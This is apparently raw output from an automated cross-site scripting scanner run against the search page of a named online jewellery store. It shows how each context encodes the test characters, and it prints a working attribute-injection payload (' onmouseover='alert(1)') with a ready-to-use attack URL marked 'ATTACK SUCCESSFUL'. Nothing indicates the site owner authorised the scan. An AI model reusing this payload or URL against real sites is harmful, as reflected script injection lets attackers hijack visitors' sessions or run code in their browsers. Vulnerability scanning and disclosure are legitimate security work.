https://www.urbanbodyjewelry.com

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.urbanbodyjewelry.com/catalogsearch/result/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input class="input-text UI-SEARCH" type="text" autocomplete="off" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" maxlength="128" />

----------------------------------------------------------------------------------
HTML Context: [3]
<title>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</title>
<strong>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</strong>
<h1>Search results for '(uvw&quot;xyz'yxz&lt;/zxy'</h1>

----------------------------------------------------------------------------------
Script Context: [1]
<script type="application/ld+json">
	{
		"@context":"http://schema.org",
		"@type":"BreadcrumbList",
		"itemListElement":[
					{
				"@type":"ListItem",
				"position":1,
				"item":{
					"@id":"https://www.urbanbodyjewelry.com/",
					"name":"Home"
				}
			},								{
				"@type":"ListItem",
				"position":2,
				"item":{
					"@id":"https://www.urbanbodyjewelry.com/catalogsearch/result/?q=(uvw%22xyz'yxz%3C/zxy",
					"name":"Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'"
				}
			}							]
	}
	</script>

----------------------------------------------------------------------------------
URI Context: [2]
<meta property="og:title" content="Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'">
<meta property="og:url" content="https://www.urbanbodyjewelry.com/catalogsearch/result/?q=(uvw%22xyz'yxz%3C/zxy">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.urbanbodyjewelry.com/catalogsearch/result/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	False

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
